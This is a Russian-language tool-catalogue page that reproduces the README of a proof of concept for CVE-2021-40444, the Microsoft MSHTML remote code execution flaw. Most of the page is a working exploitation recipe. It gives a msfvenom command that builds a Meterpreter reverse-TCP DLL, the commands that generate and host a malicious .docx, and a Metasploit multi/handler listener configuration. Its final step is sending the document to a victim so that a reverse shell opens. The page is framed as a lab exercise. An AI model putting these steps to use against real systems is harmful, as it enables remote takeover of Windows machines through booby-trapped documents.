Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-40444-POC — Попытка воспроизвести уязвимость удаленного выполнения кода (RCE) Microsoft MSHTML с использованием Metasploit Framework. | Kitploit
Инструменты/GitHubGitHub/kagura-maru/cve-2021-40444-poc
Фреймворки для эксплойтовГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubkagura-maru/cve-2021-40444-poc

CVE-2021-40444-POC

Попытка воспроизвести уязвимость удаленного выполнения кода (RCE) Microsoft MSHTML с использованием Metasploit Framework.

Репозиторий
10134 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-40444-POC

Попытка воспроизвести уязвимость удаленного выполнения кода (RCE) Microsoft MSHTML с использованием Metasploit Framework.

работает лучше всего, если не запускать в FlareVM

ПОДГОТОВКА

Клонируйте репозиторий из https://github.com/lockedbyte/CVE-2021-40444

Подготовьте .dll шаблон для последующего использования с msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll

Скопируйте созданный template.dll в папку test/ из репозитория Дайте права на выполнение template.dll с помощью chmod +x template.dll

Запустите скрипт, чтобы обработать в

template.dll
output
python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>

ПРОСЛУШИВАНИЕ

Документ будет экспортирован в папку out/, и мы можем настроить прослушиватель на нашем HTTP-порту (по умолчанию 80) python3 exploit.py host 80

Запустите metasploit с помощью msfconsole -q use multi/handler set payload windows/meterpreter/reverse_tcp set lhost <SOURCE IP> run

ПОЛЕЗНАЯ НАГРУЗКА

Затем мы можем отправить document.docx на нашу уязвимую машину и выполнить .docx

Мы получим ответ в терминале exploit.py, и лабораторная работа будет успешной, если нам удастся запустить обратную TCP-оболочку.

Скачать инструмент